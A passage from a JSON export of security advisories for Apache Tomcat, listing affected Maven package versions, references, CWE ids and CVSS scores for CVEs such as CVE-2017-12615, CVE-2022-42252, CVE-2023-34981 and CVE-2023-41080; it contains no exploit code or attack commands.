"type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2743" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2921" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2930" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2939" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2945" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:3768" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201807.mbox/%3C20180722090435.GA60759%40minotaur.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:44:57Z", "nvd_published_at": "2018-08-02T14:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mppv-79ch-vw6q", "published": "2023-06-21T12:30:19Z", "modified": "2024-04-24T19:44:03Z", "aliases": [ "BIT-tomcat-2023-34981", "CVE-2023-34981" ], "summary": "Apache Tomcat vulnerable to information leak", "details": "A regression in the fix for bug 66512 in Apache Tomcat 11.0.0-M5, 10.1.8, 9.0.74 and 8.5.88 meant that, if a response did not include any HTTP headers no AJP SEND_HEADERS message would be sent for the response which in turn meant that at least one AJP proxy (mod_proxy_ajp) would use the response headers from the previous request leading to an information leak.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", 
"events": [ { "introduced": "11.0.0-M5" }, { "fixed": "11.0.0-M6" } ] } ], "versions": [ "11.0.0-M5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-mppv-79ch-vw6q/GHSA-mppv-79ch-vw6q.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.8" }, { "fixed": "10.1.9" } ] } ], "versions": [ "10.1.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-mppv-79ch-vw6q/GHSA-mppv-79ch-vw6q.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.74" }, { "fixed": "9.0.75" } ] } ], "versions": [ "9.0.74" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-mppv-79ch-vw6q/GHSA-mppv-79ch-vw6q.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.88" }, { "fixed": "8.5.89" } ] } ], "versions": [ "8.5.88" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-mppv-79ch-vw6q/GHSA-mppv-79ch-vw6q.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34981" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/2214c8030522aa9b2a367dfa5d9acff1a03666ae" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/2f0ca2378415f4cf0748f4bc8fa955f41f803fa5" }, { "type": "WEB", "url": 
"https://github.com/apache/tomcat/commit/739c7381aed22b7636351caf885ddc519ab6b442" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/f0742f47b98aca943097f7f88e0d1163f57527e3" }, { "type": "WEB", "url": "https://bz.apache.org/bugzilla/show_bug.cgi?id=66512" }, { "type": "WEB", "url": "https://bz.apache.org/bugzilla/show_bug.cgi?id=66591" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/j1ksjh9m9gx1q60rtk1sbzmxhvj5h5qz" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230714-0003" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-8.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" } ], "database_specific": { "cwe_ids": [ "CWE-732" ], "github_reviewed": true, "github_reviewed_at": "2023-06-21T22:06:39Z", "nvd_published_at": "2023-06-21T11:15:09Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p22x-g9px-3945", "published": "2022-11-01T12:00:30Z", "modified": "2024-04-23T20:46:15.447071Z", "aliases": [ "BIT-tomcat-2022-42252", "CVE-2022-42252" ], "summary": "Apache Tomcat may reject request containing invalid Content-Length header", "details": "If Apache Tomcat 8.5.0 to 8.5.82, 9.0.0-M1 to 9.0.67, 10.0.0-M1 to 10.0.26 or 10.1.0-M1 to 10.1.0 was configured to ignore invalid HTTP headers via setting rejectIllegalHeader to false (the default for 8.5.x only), Tomcat did not reject a request containing an invalid Content-Length header making a request smuggling attack possible if Tomcat was located behind a reverse proxy that also failed to reject the request with the invalid header.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", 
"ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.83" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-p22x-g9px-3945/GHSA-p22x-g9px-3945.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.68" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", 
"9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-p22x-g9px-3945/GHSA-p22x-g9px-3945.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0-M1" }, { "fixed": "10.0.27" } ] } ], "versions": [ "10.0.0", "10.0.0-M1", "10.0.0-M10", "10.0.0-M3", "10.0.0-M4", "10.0.0-M5", "10.0.0-M6", "10.0.0-M7", "10.0.0-M8", "10.0.0-M9", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.16", "10.0.17", "10.0.18", "10.0.2", "10.0.20", "10.0.21", "10.0.22", "10.0.23", "10.0.26", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-p22x-g9px-3945/GHSA-p22x-g9px-3945.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.1" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-p22x-g9px-3945/GHSA-p22x-g9px-3945.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.68" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", 
"9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-p22x-g9px-3945/GHSA-p22x-g9px-3945.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0-M1" }, { "fixed": "10.0.27" } ] } ], "versions": [ "10.0.0", "10.0.0-M1", "10.0.0-M10", "10.0.0-M3", "10.0.0-M4", "10.0.0-M5", "10.0.0-M6", "10.0.0-M7", "10.0.0-M8", "10.0.0-M9", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.16", "10.0.17", "10.0.18", "10.0.2", "10.0.20", "10.0.21", "10.0.22", "10.0.23", "10.0.26", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-p22x-g9px-3945/GHSA-p22x-g9px-3945.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.1" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", 
"10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-p22x-g9px-3945/GHSA-p22x-g9px-3945.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42252" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/0d089a15047faf9cb3c82f80f4d28febd4798920" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/4c7f4fd09d2cc1692112ef70b8ee23a7a037ae77" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/a1c07906d8dcaf7957e5cc97f5cdbac7d18a205a" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/c9fe754e5d17e262dfbd3eab2a03ca96ff372dc3" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/zzcxzvqfdqn515zfs3dxb7n8gty589sq" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202305-37" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-8.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" } ], "database_specific": { "cwe_ids": [ "CWE-20", "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2022-11-01T18:37:42Z", "nvd_published_at": "2022-11-01T09:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-pjfr-qf3p-3q25", "published": "2018-10-17T16:30:31Z", "modified": "2025-10-22T19:26:58.224397Z", "aliases": [ "CVE-2017-12615" ], "summary": "When running Apache Tomcat on Windows with HTTP PUTs enabled it was possible to upload a JSP file to the server", "details": "When running Apache Tomcat 7.0.0 to 7.0.79 on Windows with HTTP PUTs enabled (e.g. 
via setting the readonly initialisation parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.79" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-pjfr-qf3p-3q25/GHSA-pjfr-qf3p-3q25.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12615" }, { "type": "WEB", "url": "https://www.synology.com/support/security/Synology_SA_17_54_Tomcat" }, { "type": "WEB", "url": "https://www.exploit-db.com/exploits/42953" }, { "type": "WEB", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-12615" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20171018-0001" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c%40%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/breaktoprotect/CVE-2017-12615" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-pjfr-qf3p-3q25" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0466" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0465" }, { "type": "WEB", "url": 
"https://access.redhat.com/errata/RHSA-2017:3114" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3113" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3081" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3080" }, { "type": "WEB", "url": "http://breaktoprotect.blogspot.com/2017/09/the-case-of-cve-2017-12615-tomcat-7-put.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/100901" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1039392" } ], "database_specific": { "cwe_ids": [ "CWE-434" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:49:21Z", "nvd_published_at": "2017-09-19T13:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-q3mw-pvr8-9ggc", "published": "2023-08-25T21:30:48Z", "modified": "2025-08-08T19:07:33.521950Z", "aliases": [ "BIT-tomcat-2023-41080", "CVE-2023-41080" ], "related": [ "CGA-chc4-69mh-93g6" ], "summary": "Apache Tomcat Open Redirect vulnerability", "details": "URL Redirection to Untrusted Site ('Open Redirect') vulnerability in FORM authentication feature Apache Tomcat.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92. Older, EOL versions may also be affected. 
The vulnerability is limited to the ROOT (default) web application.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M11" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/08/GHSA-q3mw-pvr8-9ggc/GHSA-q3mw-pvr8-9ggc.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.13" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/08/GHSA-q3mw-pvr8-9ggc/GHSA-q3mw-pvr8-9ggc.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.80" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", 
"9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/08/GHSA-q3mw-pvr8-9ggc/GHSA-q3mw-pvr8-9ggc.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.93" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/08/GHSA-q3mw-pvr8-9ggc/GHSA-q3mw-pvr8-9ggc.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", 
